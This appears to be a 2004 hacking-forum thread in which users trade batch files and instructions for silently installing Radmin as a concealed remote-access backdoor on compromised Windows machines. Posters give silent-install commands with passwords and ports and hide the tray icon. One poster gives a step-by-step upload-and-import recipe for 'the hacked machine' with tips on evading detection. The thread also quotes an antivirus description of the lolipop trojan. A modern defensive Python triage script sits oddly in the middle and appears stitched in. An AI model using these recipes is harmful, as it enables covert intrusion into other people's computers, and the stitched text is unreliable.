I can't find any file to download via Google or elsewhere. With the lolipop.bat you can manipulate the registry for Radmin, like the service name, I hope.
Other files are needed too:
dtreg.exe <<-- this is the one I need
I hope somebody shares this one.
skater
Jun 10 2004, 05:28 PM
CODE
r_server.exe /install /silence
r_server.EXE /pass:yourpass /save /silence
r_server.EXE /install /silence
r_server.EXE /start /silence
echo off
net start r_server
Found it on a server.
You can download the files by searching on Google.
Learnsecurity
Jun 10 2004, 05:30 PM
Hmm, what's needed is the dtreg.exe; it manipulates the registry.
Partizaan
Jun 10 2004, 07:31 PM
This one I wrote myself:
@echo off
ECHO INSTALLING SERVER
changedname.exe /pass:partizaanownzyourass /port:6969 /install /save /silence
ECHO SERVER INSTALLED NOW BOOTING UP
changedname.exe /start
ECHO SERVER IS BOOTED - ON ERROR RUN TLIST.EXE
exit
No icon in the tray (I tested it). No other files needed.
Make sure you upload
the server.exe + AdmDll.dll + your bat file.
greetz and respect
labbertasche
Jun 10 2004, 07:51 PM
lol, you found the bat on a server.
Look on gooooogle and you'll find the program. A little tip: these are the magic words: "DTREG registry"
.... Perhaps you'll find the complete *.exe.
greets labbertasche
PS: do you know the password from the bat file for Radmin?
B3T4
Jun 10 2004, 07:53 PM
Sssssssst, we already have a topic about this in Trial.
jhd
Jun 10 2004, 08:15 PM
Thx for the bat file. Now I know the command /silence.
ryoggi
Jun 11 2004, 08:45 AM
QUOTE (Partizaan @ Jun 10 2004, 07:31 PM)
This one I wrote myself:
@echo off
ECHO INSTALLING SERVER
changedname.exe /pass:partizaanownzyourass /port:6969 /install /save /silence
ECHO SERVER INSTALLED NOW BOOTING UP
changedname.exe /start
ECHO SERVER IS BOOTED - ON ERROR RUN TLIST.EXE
exit
No icon in the tray (I tested it). No other files needed.
Make sure you upload
the server.exe + AdmDll.dll + your bat file.
greetz and respect
Fine, thanks.
I have the same, but mine is with a reg key.
Learnsecurity
Jun 11 2004, 11:22 AM
NO NO NO, read the whole post, there are 2 files. Not the standard installation of Radmin, I know, install silently blablabla.
But there are two files: dtreg.exe and "lolipop.bat" (the real name). In lolipop.bat it is written how it uses dtreg.exe to manipulate the registry. The service name I know. Or does anybody have another service name than r_server? And the files can't be found with google.de; for "lolipop.bat" there is only writing about this file, but no content of this file. For dtreg.exe you need the 1.0t version, and this is also not available for download.
I hope somebody can help.
K1LL3RB0Y
Jun 11 2004, 11:25 AM
Hmm, like this? Found it on a virus list:
QUOTE
Details: Installation and Autostart
This malware usually arrives as a self-extracting WinRAR executable. Upon execution, it drops the following files in the directory where it was executed:
lolipop.bat (1,356 bytes) The Trojan runs this batch file after extraction.
r_server.exe (241,664 bytes) This legitimate application called Remote Administrator by Famatech is used by the Trojan as backdoor component.
AdmDll.dll (90,112 bytes) This file is a component of r_server.exe.
raddrv.dll (29,408 bytes) This file is another component of r_server.exe.
dtreg.exe (73,728 bytes) This legitimate tool called DTREG v1.0t is used by LOLIPOP.BAT to modify the settings of r_server.exe.
On Windows 9x systems, r_server.exe uses the following registry entries so that it executes every time Windows starts:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run r_server = <Path where the malware was executed>\r_server.exe /service
On NT based platforms, r_server.exe registers itself as a service by creating the following registry key, where it also stores information:
It has the service display name, Remote Administrator Service.
Malicious Routines
This Trojan sets up the infected system for remote access. After extracting its content, it runs the initial script LOLIPOP.BAT, which installs Remote Administrator in silent mode to hide the installation process from the user.
LOLIPOP.BAT then uses the dropped file dtreg.exe to modify the settings of Remote Administrator by editing the registry entries found in the following location:
HKEY_LOCAL_MACHINE\System\RAdmin\v2.0
It sets Remote Administrator to listen on port 8150 instead of the default port 4899 and disables it from displaying an icon in the system tray to hide its presence in the system.
Learnsecurity
Jun 11 2004, 11:28 AM
^^ I know, but that's not the file. I believe somebody has this bat @ home.
h3llraz0r
Jun 11 2004, 01:32 PM
This is not the lolipop.bat but one just like it. I think this one is set to port 4898, but you can change that to something else you like.
Hmm, the lolipop.bat doesn't change anything on the system service name. It's the normal installation with a .bat and .reg. dtreg is only used to import into the registry. That's shit, I hoped it could change the system service. Thanks for the help, somebody told shit.
Player
Jun 12 2004, 04:01 PM
Does anyone have a hex-edited Radmin so that we could use a different registry branch and a differently named DLL with it, so it would be harder to find?
Thom
Jun 13 2004, 01:48 AM
I read before on this forum that some dude tried to hex-edit the exe and change the service name without success; I think he said it was protected or something... Good luck though, you might be able to get it.
Does this add it as a service? I noticed it does a net start at the end.
Neo_
Jun 13 2004, 08:53 PM
Why not use regedit /s plop.reg?
B3T4
Jun 13 2004, 09:27 PM
Let me break it down for you.
Lolipop.bat is nothing more than the reg keys which are set when you install (and configure) Radmin. So if you want to make your own lolipop, install Radmin on your machine and set everything the way you like it (port / pass / no icon / etc). Then run regedit.exe and go to HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters,
dump that to a .reg file and upload it to the hacked machine. Now type:
radmin.exe /installservice /silence
Now import the .reg on the hacked machine. After that type: net start r_server, and your Radmin is running as a service now.
If you want to change something easily, do radmin.exe /port <port> /pass <pass> /save (I'm not sure if this is enough for everything and that you don't need the .reg anymore, but if you install the reg you're safe. BUT, if there is already a configured Radmin on the machine then a .reg won't help you and you need to do it this way).
As you may have noticed, when you install Radmin as a service it copies itself to <windir>\system32\r_server.exe. So if you want to change the name of the .exe, copy it to <windir>\system32\ so it won't need to be copied.
To change the service name, use a tool that can change these things (like my spliff). Until the last update I have not heard of anyone who managed to hex-edit Radmin, so I suggest you don't waste your time on it. It should be possible to change the ShortServiceName for it (r_server), because obviously it is stored somewhere in the registry, so with some searching and some zen you could be able to pull it off.
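An added example, not code from any poster in this thread: B3T4's recipe above boils down to exporting HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters to a .reg file and importing it on the target, and the AV writeup quoted earlier says the lolipop variant sets port 8150 and hides the tray icon. The script below parses such an export and decodes those settings, so anyone who finds a lolipop-style .reg file (or dumps the key from a suspect host with regedit /e) can read what the backdoor was configured to do without importing it. The value names Port, DisableTrayIcon and Parameter (the password hash) and their 4-byte little-endian REG_BINARY encoding are assumptions from Radmin 2.x installs, not stated on this page; confirm them against an export from your own machine. The sample export is constructed.

```python
# Added example: triage a .reg export of Radmin 2.x server parameters.
# Not from any poster in this thread. Value names "Port", "DisableTrayIcon"
# and "Parameter" are assumed from Radmin 2.x installs; verify locally.
import re

RADMIN_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters"
DEFAULT_PORT = 4899  # stock Radmin listener port, as the quoted AV writeup notes

# Constructed sample export in the shape ``regedit /e`` writes. Port 8150 is
# 0x1FD6 stored little-endian, split over a continuation line as regedit does
# for long values; the tray icon is disabled; the 16-byte "Parameter" blob is
# a placeholder, not a real password hash.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"Parameter"=hex:00,11,22,33,44,55,66,77,88,99,aa,bb,cc,dd,ee,ff
"Port"=hex:d6,1f,\
  00,00
"DisableTrayIcon"=hex:01,00,00,00
"EnableLogFile"=hex:00,00,00,00
"""


def parse_reg(text):
    """Return {key_path: {value_name: (type, data)}} for a .reg export.

    Handles hex: (REG_BINARY and other hex(N) types, kept as raw bytes),
    dword: and quoted strings, and joins regedit's backslash continuations.
    """
    text = re.sub(r"\\\r?\n\s*", "", text)  # rejoin wrapped hex values
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        if current is None or "=" not in line:
            continue
        name, _, raw = line.partition("=")
        name = "@" if name == "@" else name.strip('"')
        raw = raw.strip()
        if raw.startswith("hex"):
            payload = raw.split(":", 1)[1]
            keys[current][name] = ("REG_BINARY", bytes(int(b, 16) for b in payload.split(",") if b))
        elif raw.startswith("dword:"):
            keys[current][name] = ("REG_DWORD", int(raw[6:], 16))
        else:
            keys[current][name] = ("REG_SZ", raw.strip('"'))
    return keys


def le_dword(data):
    """Decode a 4-byte little-endian REG_BINARY value as an integer."""
    if len(data) != 4:
        raise ValueError("expected 4 bytes, got %d" % len(data))
    return int.from_bytes(data, "little")


def triage_radmin_export(reg_text):
    """Summarise Radmin server settings found in a .reg export.

    Reports the listener port, whether the tray icon is suppressed, and a
    list of findings that deviate from a stock install or matter to a
    responder (the exported password hash can be replayed onto another host).
    """
    params = parse_reg(reg_text).get(RADMIN_KEY)
    if params is None:
        return {"present": False, "port": None, "tray_icon_disabled": False, "findings": []}
    findings, port = [], None
    if "Port" in params:
        port = le_dword(params["Port"][1])
        if port != DEFAULT_PORT:
            findings.append("non-default listener port %d (default %d)" % (port, DEFAULT_PORT))
    tray_disabled = "DisableTrayIcon" in params and le_dword(params["DisableTrayIcon"][1]) != 0
    if tray_disabled:
        findings.append("tray icon disabled: server runs with no visible indicator")
    if "Parameter" in params:
        findings.append("password hash present (%d bytes); treat the .reg file as a credential"
                        % len(params["Parameter"][1]))
    return {"present": True, "port": port, "tray_icon_disabled": tray_disabled, "findings": findings}


if __name__ == "__main__":
    result = triage_radmin_export(SAMPLE_REG)
    print("Radmin parameters present:", result["present"])
    print("port:", result["port"], "| tray icon disabled:", result["tray_icon_disabled"])
    for finding in result["findings"]:
        print(" -", finding)
```

Run it against a real export by replacing SAMPLE_REG with the file contents (regedit writes UTF-16 LE, so open it with encoding="utf-16"). The same decoding applies to the import direction: a .reg file whose Port bytes do not decode to 4899, or whose DisableTrayIcon is non-zero, is configured the way the quoted writeup describes.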
Player
Jun 14 2004, 01:32 AM
I searched the forum for your spliff, but had no luck. Will you post a link please? Thanks.
B3T4
Jun 14 2004, 09:34 AM
QUOTE (Player @ Jun 14 2004, 01:32 AM)
I searched the forum for your spliff, but had no luck. Will you post a link please? Thanks.